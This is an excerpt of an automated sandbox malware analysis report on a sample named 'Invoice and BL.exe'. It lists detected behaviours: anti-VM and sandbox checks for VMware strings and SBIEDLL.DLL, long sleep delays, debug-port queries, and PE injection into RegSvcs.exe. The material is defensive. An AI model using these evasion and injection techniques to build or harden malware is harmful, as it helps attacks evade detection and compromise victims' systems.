            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

            Malware Analysis System Evasion:

            Yara detected AntiVM3
            Source: Yara match File source: Process Memory Space: Invoice and BL.exe PID: 1152, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
            Source: C:\Users\user\Desktop\Invoice and BL.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Invoice and BL.exe TID: 908 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Last function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 7_2_00403D74
            Source: C:\Users\user\Desktop\Invoice and BL.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 60000
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmp Binary or memory string: vmware
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmp Binary or memory string: VMWARE
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
            Source: RegSvcs.exe, 00000007.00000002.294755116.0000000000F48000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\Invoice and BL.exe Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0041289A LdrInitializeThunk, 7_2_0041289A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0040317B mov eax, dword ptr fs:[00000030h] 7_2_0040317B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00402B7C GetProcessHeap,RtlAllocateHeap, 7_2_00402B7C
            Source: C:\Users\user\Desktop\Invoice and BL.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\Invoice and BL.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\Invoice and BL.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Invoice and BL.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Users\user\Desktop\Invoice and BL.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
            Source: C:\Users\user\Desktop\Invoice and BL.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 415000
            Source: C:\Users\user\Desktop\Invoice and BL.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41A000
            Source: C:\Users\user\Desktop\Invoice and BL.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 4A0000
            Source: C:\Users\user\Desktop\Invoice and BL.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: BA2008
            Source: C:\Users\user\Desktop\Invoice and BL.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Users\user\Desktop\Invoice and BL.exe VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
